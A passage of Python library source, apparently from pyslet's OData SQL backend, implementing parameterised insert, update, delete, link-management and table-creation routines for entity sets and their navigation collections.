entity.set_concurrency_tokens()
query = ['INSERT INTO ', self.table_name, ' (']
insert_values = list(self.insert_fields(entity))
# watch out for exposed FK fields!
for fkname, fkv in fk_values:
i = 0
while i < len(insert_values):
iname, iv = insert_values[i]
if fkname == iname:
# fk overrides - update the entity's value
iv.set_from_value(fkv.value)
# now drop it from the list to prevent
# double column names
del insert_values[i]
else:
i += 1
column_names, values = zip(*(insert_values + fk_values))
query.append(", ".join(column_names))
query.append(') VALUES (')
params = self.container.ParamsClass()
query.append(
", ".join(params.add_param(
self.container.prepare_sql_value(x)) for x in values))
query.append(')')
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
# before we can say the entity exists we need to ensure
# we have the key
auto_fields = list(self.auto_fields(entity))
if auto_fields:
# refresh these fields in the entity
self.get_auto(entity, auto_fields, transaction)
entity.exists = True
# Step 3
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
elif k in nav_done:
dv.bindings = []
continue
aset_name = link_end.parent.name
target_set = dv.target()
target_fk_mapping = self.container.fk_table[target_set.name]
with dv.open() as navCollection:
with target_set.open() as targetCollection:
while dv.bindings:
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
targetCollection.select_keys()
binding = targetCollection[binding]
if binding.exists:
navCollection.insert_link(binding, transaction)
else:
if link_end.otherEnd in target_fk_mapping:
# target table has a foreign key
target_fk_values = []
for key_name in self.entity_set.keys:
target_fk_values.append(
(self.container.mangled_names[
(target_set.name,
aset_name,
key_name)],
entity[key_name]))
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
target_fk_values,
transaction=transaction)
else:
# foreign keys are in an auxiliary table
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
transaction=transaction)
navCollection.insert_link(
binding, transaction)
dv.bindings = dv.bindings[1:]
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we might need to distinguish between a failure due to
# fk_values or a missing key
transaction.rollback(e, swallow=True)
# swallow the error as this should indicate a failure at the
# point of INSERT, fk_values may have violated a unique
# constraint but we can't make that distinction at the
# moment.
raise edm.ConstraintError(
"insert_entity failed for %s : %s" %
(str(
entity.get_location()),
str(e)))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def get_auto(self, entity, auto_fields, transaction):
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*auto_fields)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
# no join clause required
if self.auto_keys:
query.append(self.where_last(entity, params))
else:
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key after insert")
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.expand(self.expand, self.select)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def test_key(self, entity, transaction):
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*list(self.key_fields(entity)))
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
result = False
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" %
repr(entity.key()))
else:
result = True
transaction.commit()
return result
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def where_last(self, entity, params):
raise NotImplementedError("Automatic keys not supported")
def update_entity(self, entity):
"""Updates *entity*
This method follows a very similar pattern to :py:meth:`InsertMethod`,
using a three-phase process.
1. Process all bindings for which we hold the foreign key.
This includes inserting new entities where deep inserts are
being used or calculating foreign key values where links to
existing entities have been specified on update.
2. A simple SQL UPDATE statement is executed to update the
record in the database along with any updated foreign keys
generated in (1).
3. Process all remaining bindings while retaining transactional
integrity (where supported).
Links to existing entities are created using the insert_link
or replace methods available on the SQL-specific
:py:class:`SQLNavigationCollection`. The replace method is
used when a navigation property that links to a single
entity has been bound. Deep inserts are handled by calling
insert_entity_sql before the link is created.
The same transactional behaviour as :py:meth:`insert_entity_sql` is
exhibited."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non existent entity: " +
str(entity.get_location()))
fk_values = []
fk_values = []
fk_mapping = self.container.fk_table[self.entity_set.name]
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
nav_done = set()
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
aset_name = link_end.parent.name
# if link_end is in fk_mapping it means we are keeping a
# foreign key for this property, it may even be required but
# either way, let's deal with it now. This will insert or
# update the link automatically, this navigation property
# can never be a collection
if link_end not in fk_mapping:
continue
target_set = link_end.otherEnd.entity_set
nullable, unique = fk_mapping[link_end]
if len(dv.bindings) > 1:
raise edm.NavigationError(
"Unexpected error: found multiple bindings for "
"foreign key constraint %s" % k)
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
# just a key, grab the entity
with target_set.open() as targetCollection:
targetCollection.select_keys()
target_entity = targetCollection[binding]
dv.bindings[0] = target_entity
else:
target_entity = binding
if not target_entity.exists:
# add this entity to it's base collection
with target_set.open() as targetCollection:
targetCollection.insert_entity_sql(
target_entity, link_end.otherEnd, transaction)
# Finally, we have a target entity, add the foreign key to
# fk_values
for key_name in target_set.keys:
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name,
aset_name,
key_name)],
target_entity[key_name]))
nav_done.add(k)
# grab a list of sql-name,sql-value pairs representing the key
# constraint
concurrency_check = False
constraints = []
for k, v in dict_items(entity.key_dict()):
constraints.append(
(self.container.mangled_names[
(self.entity_set.name, k)],
self.container.prepare_sql_value(v)))
key_len = len(constraints)
cv_list = list(self.update_fields(entity))
for cname, v in cv_list:
# concurrency tokens get added as if they were part of the key
if v.p_def.concurrencyMode == edm.ConcurrencyMode.Fixed:
concurrency_check = True
constraints.append(
(cname, self.container.prepare_sql_value(v)))
# now update the entity to have the latest concurrency token
entity.set_concurrency_tokens()
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
for cname, v in cv_list + fk_values:
updates.append(
'%s=%s' %
(cname,
params.add_param(self.container.prepare_sql_value(v))))
if updates:
query.append(', '.join(updates))
query.append(' WHERE ')
where = []
for cname, cvalue in constraints:
where.append('%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if updates and transaction.cursor.rowcount == 0:
# we need to check if this entity really exists
query = ['SELECT COUNT(*) FROM ', self.table_name, ' WHERE ']
params = self.container.ParamsClass()
where = []
for cname, cvalue in constraints:
where.append('%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
result = transaction.cursor.fetchone()[0]
if result == 0 and concurrency_check:
# could be a concurrency error, repeat with just keys
query = [
'SELECT COUNT(*) FROM ', self.table_name, ' WHERE ']
params = self.container.ParamsClass()
where = []
for cname, cvalue in constraints[:key_len]:
where.append(
'%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
result = transaction.cursor.fetchone()[0]
if result == 1:
raise edm.ConcurrencyError
if result == 0:
raise KeyError("Entity %s does not exist" %
str(entity.get_location()))
# otherwise, no rows affected, but ignore!
# We finish off the bindings in a similar way to
# insert_entity_sql but this time we need to handle the case
# where there is an existing link and the navigation
# property is not a collection.
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
elif k in nav_done:
dv.bindings = []
continue
aset_name = link_end.parent.name
target_set = dv.target()
target_fk_mapping = self.container.fk_table[target_set.name]
with dv.open() as navCollection:
with target_set.open() as targetCollection:
while dv.bindings:
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
targetCollection.select_keys()
binding = targetCollection[binding]
if binding.exists:
if dv.isCollection:
navCollection.insert_link(
binding, transaction)
else:
navCollection.replace_link(binding,
transaction)
else:
if link_end.otherEnd in target_fk_mapping:
# target table has a foreign key
target_fk_values = []
for key_name in self.entity_set.keys:
target_fk_values.append(
(self.container.mangled_names[
(target_set.name,
aset_name,
key_name)],
entity[key_name]))
if not dv.isCollection:
navCollection.clear_links(transaction)
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
target_fk_values,
transaction)
else:
# foreign keys are in an auxiliary table
targetCollection.insert_entity_sql(
binding, link_end.otherEnd)
if dv.isCollection:
navCollection.insert_link(
binding, transaction)
else:
navCollection.replace_link(
binding, transaction)
dv.bindings = dv.bindings[1:]
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we might need to distinguish between a failure due to
# fk_values or a missing key
transaction.rollback(e, swallow=True)
raise edm.ConstraintError(
"Update failed for %s : %s" %
(str(
entity.get_location()),
str(e)))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def update_link(
self,
entity,
link_end,
target_entity,
no_replace=False,
transaction=None):
"""Updates a link when this table contains the foreign key
entity
The entity being linked from (must already exist)
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the assocation being modified.
target_entity
The entity to link to or None if the link is to be removed.
no_replace
If True, existing links will not be replaced. The affect is
to force the underlying SQL query to include a constraint
that the foreign key is currently NULL. By default this
argument is False and any existing link will be replaced.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non-existent entity: " +
str(entity.get_location()))
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
null_cols = []
target_set = link_end.otherEnd.entity_set
aset_name = link_end.parent.name
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
if not nullable and target_entity is None:
raise edm.NavigationError("Can't remove a required link")
if target_entity:
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
if no_replace:
null_cols.append(cname)
else:
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
query.append(', '.join(updates))
# we don't do concurrency checks on links, and we suppress the filter
# check too
query.append(
self.where_clause(entity, params, False, null_cols=null_cols))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
if null_cols:
# raise a constraint failure, rather than a key failure -
# assume entity is good
raise edm.NavigationError(
"Entity %s is already linked through association %s" %
(entity.get_location(), aset_name))
else:
# key failure - unexpected case as entity should be good
raise KeyError("Entity %s does not exist" %
str(entity.get_location()))
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise KeyError("Linked entity %s does not exist" %
str(target_entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def __delitem__(self, key):
with self.entity_set.open() as base:
entity = base.new_entity()
entity.set_key(key)
entity.exists = True # an assumption!
# base.select_keys()
# entity = base[key]
self.delete_entity(entity)
def delete_entity(self, entity, from_end=None, transaction=None):
"""Deletes an entity
Called by the dictionary-like del operator, provided as a
separate method to enable it to be called recursively when
doing cascade deletes and to support transactions.
from_end
An optional
:py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound to
this entity set that represents the link from which we are
being deleted during a cascade delete.
The purpose of this parameter is prevent cascade deletes
from doubling back on themselves and causing an infinite
loop.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
fk_mapping = self.container.fk_table[self.entity_set.name]
for link_end, nav_name in dict_items(self.entity_set.linkEnds):
if link_end == from_end:
continue
aset_name = link_end.parent.name
if link_end in fk_mapping:
# if we are holding a foreign key then deleting us
# will delete the link too, so nothing to do here.
continue
else:
if (link_end.associationEnd.multiplicity ==
edm.Multiplicity.One):
# we are required, so it must be a 1-? relationship
if nav_name is not None:
# and it is bound to a navigation property so we
# can cascade delete
target_entity_set = link_end.otherEnd.entity_set
with entity[nav_name].open() as links:
with target_entity_set.open() as \
cascade:
links.select_keys()
for target_entity in links.values():
links.delete_link(target_entity,
transaction)
cascade.delete_entity(
target_entity,
link_end.otherEnd,
transaction)
else:
raise edm.NavigationError(
"Can't cascade delete from an entity in %s as "
"the association set %s is not bound to a "
"navigation property" %
(self.entity_set.name, aset_name))
else:
# we are not required, so just drop the links
if nav_name is not None:
with entity[nav_name].open() as links:
links.clear_links(transaction)
# otherwise annoying, we need to do something special
elif aset_name in self.container.aux_table:
# foreign keys are in an association table,
# hardest case as navigation may be unbound so
# we have to call a class method and pass the
# container and connection
SQLAssociationCollection.clear_links_unbound(
self.container, link_end, entity, transaction)
else:
# foreign keys are at the other end of the
# link, we have a method for that...
target_entity_set = link_end.otherEnd.entity_set
with target_entity_set.open() as \
keyCollection:
keyCollection.clear_links(
link_end.otherEnd, entity, transaction)
params = self.container.ParamsClass()
query = ["DELETE FROM "]
params = self.container.ParamsClass()
query.append(self.table_name)
# WHERE - ignore the filter
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
if rowcount == 0:
raise KeyError
elif rowcount > 1:
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" %
repr(entity.key()))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def delete_link(self, entity, link_end, target_entity, transaction=None):
"""Deletes the link between *entity* and *target_entity*
The foreign key for this link must be held in this entity set's
table.
entity
The entity in this entity set that the link is from.
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the assocation being modified.
target_entity
The target entity that defines the link to be removed.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non-existent entity: " +
str(entity.get_location()))
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
if not nullable:
raise edm.NavigationError(
"Can't remove a required link from association set %s" %
aset_name)
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
query.append(', '.join(updates))
# custom where clause to ensure that the link really existed before we
# delete it
query.append(' WHERE ')
where = []
kd = entity.key_dict()
for k, v in dict_items(kd):
where.append(
'%s=%s' %
(self.container.mangled_names[
(self.entity_set.name, k)], params.add_param(
self.container.prepare_sql_value(v))))
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
where.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
# no rows matched this constraint, entity either doesn't exist
# or wasn't linked to the target
raise KeyError(
"Entity %s does not exist or is not linked to %s" % str(
entity.get_location(),
target_entity.get_location))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def clear_links(self, link_end, target_entity, transaction=None):
"""Deletes all links to *target_entity*
The foreign key for this link must be held in this entity set's
table.
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the assocation being modified.
target_entity
The target entity that defines the link(s) to be removed.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
# custom where clause
query.append(', '.join(updates))
query.append(' WHERE ')
where = []
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
where.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# catch the nullable violation here, makes it benign to
# clear links to an unlinked target
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Can't remove required link from assocation set %s" %
aset_name)
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def create_table_query(self):
"""Returns a SQL statement and params for creating the table."""
entity = self.new_entity()
query = ['CREATE TABLE ', self.table_name, ' (']
params = self.container.ParamsClass()
cols = []
cnames = {}
for c, v in self.select_fields(entity, prefix=False):
if c in cnames:
continue
else:
cnames[c] = True
cols.append("%s %s" %
(c, self.container.prepare_sql_type(v, params)))
# do we have a media stream?
if self.entity_set.entityType.has_stream():
v = edm.EDMValue.from_type(edm.SimpleType.Int64)
c = self.container.mangled_names[(self.entity_set.name, '_value')]
cnames[c] = True
cols.append("%s %s" %
(c, self.container.prepare_sql_type(v, params)))
constraints = []
constraints.append(
'PRIMARY KEY (%s)' %
', '.join(self.container.mangled_names[(self.entity_set.name, x)]
for x in self.entity_set.keys))
# Now generate the foreign keys
fk_mapping = self.container.fk_table[self.entity_set.name]
for link_end in fk_mapping:
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = fk_mapping[link_end]
fk_names = []
k_names = []
for key_name in target_set.keys:
# create a dummy value to catch the unusual case where
# there is a default
v = target_set.entityType[key_name]()
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
fk_names.append(cname)
k_names.append(
self.container.mangled_names[(target_set.name, key_name)])
if cname in cnames:
# if a fk is already declared, skip it
continue
else:
cols.append("%s %s" % (
cname,
self.container.prepare_sql_type(
v, params, nullable)))
constraints.append(
"CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s(%s)" %
(self.container.quote_identifier(aset_name), ', '.join(
fk_names), self.container.mangled_names[
(target_set.name,)], ', '.join(
k_names)))
cols = cols + constraints
query.append(", ".join(cols))
query.append(')')
return ''.join(query), params
def create_table(self):
"""Executes the SQL statement :py:meth:`create_table_query`"""
query, params = self.create_table_query()
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def drop_table_query(self):
"""Returns a SQL statement for dropping the table."""
query = ['DROP TABLE ', self.table_name]
return ''.join(query)
def drop_table(self):
"""Executes the SQL statement :py:meth:`drop_table_query`"""
query = self.drop_table_query()
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s;", query)
transaction.execute(query)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
class SQLNavigationCollection(SQLCollectionBase, core.NavigationCollection):
"""Abstract class representing all navigation collections.
Additional keyword arguments:
aset_name
The name of the association set that defines this relationship.
This additional parameter is used by the name mangler to obtain
the field name (or table name) used for the foreign keys."""
def __init__(self, aset_name, **kwargs):
self.aset_name = aset_name
super(SQLNavigationCollection, self).__init__(**kwargs)
def __setitem__(self, key, entity):
# sanity check entity to check it can be inserted here
if (not isinstance(entity, edm.Entity) or
entity.entity_set is not self.entity_set):
raise TypeError
if key != entity.key():
raise ValueError
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to link to a non-existent entity: " +
str(entity.get_location()))
self.insert_link(entity)
def insert_link(self, entity, transaction=None):
"""Inserts a link to *entity* into this collection.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
def replace(self, entity):
if (not isinstance(entity, edm.Entity) or
entity.entity_set is not self.entity_set):
raise TypeError
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to link to a non-existent entity: " +
str(entity.get_location()))
self.replace_link(entity)
def replace_link(self, entity, transaction=None):
"""Replaces all links with a single link to *entity*.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
def delete_link(self, entity, transaction=None):
"""A utility method that deletes the link to *entity* in this collection.
This method is called during cascaded deletes to force-remove a
link prior to the deletion of the entity itself.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
class SQLForeignKeyCollection(SQLNavigationCollection):
"""The collection of entities obtained by navigation via a foreign key
This object is used when the foreign key is stored in the same table
as *from_entity*. This occurs when the relationship is one of::
0..1 to 1
Many to 1
Many to 0..1
The name mangler looks for the foreign key in the field obtained by
mangling::
(entity set name, association set name, key name)
For example, suppose that a link exists from entity set Orders[*] to
entity set Customers[0..1] and that the key field of Customer is
"CustomerID". If the association set that binds Orders to Customers
with this link is called OrdersToCustomers then the foreign key would
be obtained by looking up::
('Orders','OrdersToCustomers','CustomerID')
By default this would result in the field name::
'OrdersToCustomers_CustomerID'
This field would be looked up in the 'Orders' table. The operation
of the name mangler can be customised by overriding the
:py:meth:`SQLEntityContainer.mangle_name` method in the container."""
def __init__(self, **kwargs):
super(SQLForeignKeyCollection, self).__init__(**kwargs)
self.keyCollection = self.from_entity.entity_set.open()
def reset_joins(self):
"""Overridden to provide an inner join to *from_entity*'s table.
The join clause introduces an alias for the table containing
*from_entity*. The resulting join looks something like this::
SELECT ... FROM Customers
INNER JOIN Orders AS nav1 ON
Customers.CustomerID=nav1.OrdersToCustomers_CustomerID
...
WHERE nav1.OrderID = ?;
The value of the OrderID key property in from_entity is passed as
a parameter when executing the expression.
In most cases, there will be a navigation properly bound to this
association in the reverse direction. For example, to continue
the above example, Orders to Customers might be bound to a
navigation property in the reverse direction called, say,
'AllOrders' *in the target entity set*.
If this navigation property is used in an expression then the
existing INNER JOIN defined here is used instead of a new LEFT
JOIN as would normally be the case."""
super(SQLForeignKeyCollection, self).reset_joins()
# nav_name is the navigation property from this entity set that
# takes you back to the from_entity. It may by an empty string
# if there is no back link. We need to know this in case
# someone adds this navigation property to an expression, they
# need to use our inner join in preference to the usual left
# join.
nav_name = self.entity_set.linkEnds[self.from_end.otherEnd]
alias = self.next_alias()
join = []
# we don't need to look up the details of the join again, as
# self.entity_set must be the target
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias, self.container.mangled_names[
(self.from_entity.entity_set.name,
self.aset_name, key_name)]))
join = ' INNER JOIN %s AS %s ON ' % (
self.container.mangled_names[(self.from_entity.entity_set.name,)],
alias) + ' AND '.join(join)
self._aliases.add(alias)
self._joins[nav_name] = (alias, join)
self._source_alias = alias
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Adds the constraint for entities linked from *from_entity* only.
We continue to use the alias set in the :py:meth:`join_clause`
where an example WHERE clause is illustrated."""
if self._joins is None:
self.reset_joins()
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(self._source_alias, self.container.mangled_names[
(self.from_entity.entity_set.name, k)], params.add_param(
self.container.prepare_sql_value(v))))
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def insert_entity(self, entity):
transaction = SQLTransaction(self.container, self.connection)
try:
# Because of the nature of the relationships we are used
# for, *entity* can be inserted into the base collection
# without a link back to us (the link is optional from
# entity's point of view). We still force the insert to
# take place without a commit as the insertion of the link
# afterwards might still fail.
transaction.begin()
with self.entity_set.open() as baseCollection:
baseCollection.insert_entity_sql(
entity, self.from_end.otherEnd, transaction=transaction)
self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
no_replace=True,
transaction=transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we can't tell why the operation failed, could be a
# KeyError, if we are trying to insert an existing entity or
# could be a ConstraintError if we are already linked to a
# different entity
transaction.rollback(e, swallow=True)
raise edm.NavigationError(str(e))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
return self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
no_replace=True,
transaction=transaction)
def replace_link(self, entity, transaction=None):
# Target multiplicity must be 0..1 or 1; treat it the same as setitem
return self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
transaction=transaction)
def delete_link(self, entity, transaction=None):
return self.keyCollection.delete_link(
self.from_entity,
self.from_end,
entity,
transaction=transaction)
def __delitem__(self, key):
# Before we remove a link we need to know if this is ?-1
# relationship, if so, this deletion will result in a
# constraint violation.
if self.toMultiplicity == edm.Multiplicity.One:
raise edm.NavigationError("Can't remove a required link")
# Turn the key into an entity object as required by delete_link
with self.entity_set.open() as targetCollection:
target_entity = targetCollection.new_entity()
target_entity.set_key(key)
# we open the base collection and call the update link method
self.keyCollection.delete_link(
self.from_entity, self.from_end, target_entity)
def close(self):
if self.keyCollection is not None:
self.keyCollection.close()
super(SQLForeignKeyCollection, self).close()
class SQLReverseKeyCollection(SQLNavigationCollection):
"""The collection of entities obtained by navigation to a foreign key
This object is used when the foreign key is stored in the target
table. This occurs in the reverse of the cases where
:py:class:`SQLReverseKeyCollection` is used, i.e:
1 to 0..1
1 to Many
0..1 to Many
The implementation is actually simpler in this direction as no JOIN
clause is required."""
def __init__(self, **kwargs):
super(SQLReverseKeyCollection, self).__init__(**kwargs)
self.keyCollection = self.entity_set.open()
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Adds the constraint to entities linked from *from_entity* only."""
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append("%s=%s" % (
self.container.mangled_names[
(self.entity_set.name, self.aset_name, k)],
params.add_param(self.container.prepare_sql_value(v))))
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def insert_entity(self, entity):
transaction = SQLTransaction(self.container, self.connection)
fk_values = []
for k, v in dict_items(self.from_entity.key_dict()):
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name, self.aset_name, k)], v))
try:
transaction.begin()
self.keyCollection.insert_entity_sql(
entity, self.from_end.otherEnd, fk_values, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise KeyError(str(entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
return self.keyCollection.update_link(
entity,
self.from_end.otherEnd,
self.from_entity,
no_replace=True,
transaction=transaction)
# we use no_replace mode as the source multiplicity must be 1 or
# 0..1 for this type of collection and if *entity* is already
# linked it would be an error
def replace_link(self, entity, transaction=None):
if self.fromMultiplicity == edm.Multiplicity.One:
# we are required, this must be an error
raise edm.NavigationError(
"Can't delete required link from association set %s" %
self.aset_name)
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
self.keyCollection.clear_links(
self.from_end.otherEnd, self.from_entity, transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def __delitem__(self, key):
entity = self.keyCollection[key]
if self.fromMultiplicity == edm.Multiplicity.One:
# we are required, this must be an error
raise edm.NavigationError(
"Can't delete required link from association set %s" %
self.aset_name)
# fromMultiplicity is 0..1
self.keyCollection.delete_link(
entity, self.from_end.otherEnd, self.from_entity)
def delete_link(self, entity, transaction=None):
"""Called during cascaded deletes.
This is actually a no-operation as the foreign key for this
association is in the entity's record itself and will be removed
automatically when entity is deleted."""
return 0
def clear(self):
self.keyCollection.clear_links(
self.from_end.otherEnd,
self.from_entity)
def clear_links(self, transaction=None):
"""Deletes all links from this collection's *from_entity*
transaction
An optional transaction. If present, the connection is left
uncommitted."""
self.keyCollection.clear_links(
self.from_end.otherEnd, self.from_entity, transaction)
def close(self):
self.keyCollection.close()
super(SQLReverseKeyCollection, self).close()
class SQLAssociationCollection(SQLNavigationCollection):
"""The collection obtained by navigation using an auxiliary table
This object is used when the relationship is described by two sets
of foreign keys stored in an auxiliary table. This occurs mainly
when the link is Many to Many but it is also used for 1 to 1
relationships. This last use may seem odd but it is used to
represent the symmetry of the relationship. In practice, a single
set of foreign keys is likely to exist in one table or the other and
so the relationship is best modelled by a 0..1 to 1 relationship
even if the intention is that the records will always exist in
pairs.
